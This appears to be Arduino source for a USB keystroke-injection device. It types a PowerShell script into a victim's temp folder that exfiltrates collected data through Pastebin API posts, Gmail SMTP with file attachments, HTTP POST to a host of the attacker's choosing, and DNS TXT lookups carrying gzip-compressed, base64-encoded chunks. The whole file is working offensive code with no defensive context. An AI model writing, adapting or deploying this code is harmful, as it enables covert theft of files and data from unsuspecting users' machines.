void post(String filename)
{
    Keyboard.print(F("echo function pht($url,$pars) { >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $ht = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $ht.open(\"POST\", $url, $false) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $ht.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\") >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $ht.setRequestHeader(\"Content-length\", $pars.length); >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $ht.setRequestHeader(\"Connection\", \"close\") >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $ht.send($pars) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $script:sk=$ht.responseText }>> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
}

void compress_encode(String filename)
{
    Keyboard.print(F("echo $r = [string]::Join(\"`n\", $pv) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $ms = New-Object IO.MemoryStream >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $sw = New-Object System.IO.StreamWriter($cs) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $sw.Write($r) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $sw.Close() >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $code = [Convert]::ToBase64String($ms.ToArray()) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $code >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
}

void pastebin(String filename)
{
    post(filename);
    Keyboard.print(F("echo pht \"https://pastebin.com/api/api_login.php\" \"api_dev_key=$dev&api_user_name=$user&api_user_password=$pass\" >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo pht \"https://pastebin.com/api/api_post.php\" \"api_user_key=$sk&api_option=paste&api_dev_key=$dev&api_paste_name=$pn&api_paste_code=$pv&api_paste_private=2\" >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
}

void gmail(String filename, String filepath)
{
    Keyboard.print(F("echo $srv = \"smtp.gmail.com\" >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $msg = new-object Net.Mail.MailMessage >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $st = new-object Net.Mail.SmtpClient($srv) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $st.EnableSsl = $True >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $st.Credentials = New-Object System.Net.NetworkCredential(\"$user\", \"$pass\"); >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $msg.From = \"$user@gmail.com\" >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $msg.To.Add(\"$user@gmail.com\") >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $msg.Subject = $pn >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $msg.Body = $pv >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    if (filepath != "no"){

        Keyboard.print(F("echo $att = new-object Net.Mail.Attachment(\""));
        Keyboard.print(F(filepath));
        Keyboard.print (F("\") >> %temp%\\\"));
        Keyboard.print(F(filename));
        Keyboard.println(F(".ps1"));
        Keyboard.print(F("echo $msg.Attachments.Add($att) >> %temp%\\\"));
        Keyboard.print(F(filename));
        Keyboard.println(F(".ps1"));
    }
    Keyboard.print(F("echo $st.Send($msg) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
}

void hpost (String filename)
{
    compress_encode(filename);
    post(filename);
    Keyboard.print(F("echo pht $user $code >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
}

void dns (String filename)
{
    compress_encode(filename);
    Keyboard.print(F("echo $lstr = 0 >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $qrs = [int]($code.Length/63) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo while ($qrs -ne 0){ >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $qs = $code.Substring($lstr,63) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo Invoke-Expression \"nslookup -querytype=txt $qs.$user $pass\" >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $lstr += 63 >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $qrs -= 1 } >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $mod = $code.Length%63 >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo $qr = $code.Substring($code.Length - $mod, $mod) >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
    Keyboard.print(F("echo Invoke-Expression \"nslookup -querytype=txt $qr.$user $pass\" >> %temp%\\\"));
    Keyboard.print(F(filename));
    Keyboard.println(F(".ps1"));
}
